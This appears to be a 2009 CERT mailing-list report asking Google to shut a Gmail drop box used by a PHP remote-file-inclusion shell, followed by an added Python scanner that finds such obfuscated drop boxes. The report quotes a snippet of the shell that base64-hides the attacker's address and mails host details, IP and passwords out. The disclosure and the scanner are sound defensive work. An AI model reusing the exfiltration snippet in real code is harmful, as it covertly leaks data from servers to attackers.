[nsp-sec] Attn google - gmail drop box - rfi attack
Rodolfo Baader
rbaader at arcert.gov.ar
Mon Jun 1 16:25:37 EDT 2009
Hi!
While investigating the following URLs involved in an RFI attack
-http://compraloenlinea.com.mx//copyright[1].txt
-http://compraloenlinea.com.mx//readme[1].txt
we found that the attacker was sending information to the following email address:
$creator="fr33sh3ll at gmail.com"
See below [*1] for part of the code we found.
Could you please investigate and take the appropriate actions?
Regards,
R.
*===========================================================
[*1] Piece of the code
...
$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2
$pwds";
$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);
*===========================================================
--
-----------------------------------------------
ArCERT - http://www.arcert.gov.ar
Tel: (54-11) 4343-9001 int.512/514 | 4345-0383
Fax:(54-11) 4343-7458
Av.R. Saenz Peña 511 - Of:514
C1035AAA - Ciudad Autonoma de Buenos Aires
Argentina
-----------------------------------------------
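The quoted shell hides its mail drop box behind base64_decode() and builds the report from host-fingerprinting calls (php_uname, getenv, gethostbyaddr). The scanner below, an added example that is not part of the report or of ArCERT's tooling, decodes every base64_decode("...") literal assigned to a variable in a PHP file, checks whether the result is an e-mail address that is then passed to mail() as recipient, and lists the fingerprinting calls present. The sample input is constructed from the snippet above; regex names and the function scan_php are assumptions.

```python
import base64
import re

# Constructed sample modelled on the snippet quoted in the report above
# (same obfuscated recipient; the rest trimmed to the relevant calls).
SAMPLE_PHP = r'''
$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv("REMOTE_ADDR");
mail( $creator, $subj, $msg, $from);
'''

# $var = base64_decode("....");  -> capture variable name and the literal
ASSIGN_B64 = re.compile(
    r'(\$\w+)\s*=\s*base64_decode\(\s*([\'"])([A-Za-z0-9+/=]+)\2\s*\)')
EMAIL = re.compile(r'^[\w.+-]+@[\w-]+(?:\.[\w-]+)+$')
FINGERPRINT_CALLS = ('php_uname', 'getenv', 'gethostbyaddr', 'phpversion')


def decode_literal(text):
    """Strictly decode a base64 literal; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(text, validate=True).decode('utf-8')
    except (ValueError, UnicodeDecodeError):
        return None


def scan_php(src):
    """Report obfuscated mail drop boxes in PHP source.

    Returns a dict with:
      dropboxes   - decoded e-mail addresses passed to mail() as recipient
      decoded     - {variable: decoded text} for base64_decode("...") literals
      fingerprint - host-fingerprinting calls found (what would be exfiltrated)
    """
    decoded = {}
    for var, _quote, literal in ASSIGN_B64.findall(src):
        value = decode_literal(literal)
        if value is not None:
            decoded[var] = value
    dropboxes = []
    for var, value in decoded.items():
        # recipient is the first argument of mail(): look for "mail( $var"
        recipient = re.compile(r'\bmail\s*\(\s*' + re.escape(var) + r'\b')
        if EMAIL.match(value) and recipient.search(src):
            dropboxes.append(value)
    fingerprint = [f for f in FINGERPRINT_CALLS
                   if re.search(r'\b' + f + r'\s*\(', src)]
    return {'dropboxes': dropboxes, 'decoded': decoded, 'fingerprint': fingerprint}


if __name__ == '__main__':
    print(scan_php(SAMPLE_PHP))
```

Run it over the web root (for example with os.walk over *.php files) to get the drop-box address to report, as done above, without executing the suspect file.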